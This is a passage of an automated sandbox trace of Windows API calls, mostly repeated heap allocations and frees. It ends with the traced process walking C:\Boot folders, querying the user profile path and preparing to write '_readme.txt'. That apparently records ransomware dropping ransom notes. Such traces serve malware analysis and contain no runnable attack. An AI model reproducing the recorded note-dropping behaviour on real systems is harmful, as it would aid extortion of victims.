[0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.628] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0173.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.628] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.628] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.628] PathFindFileNameW (pszPath="") returned="" [0173.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.628] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.629] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.629] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.629] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8d2f0 [0173.630] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0173.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.630] HeapFree (in: hHeap=0x2c0000, 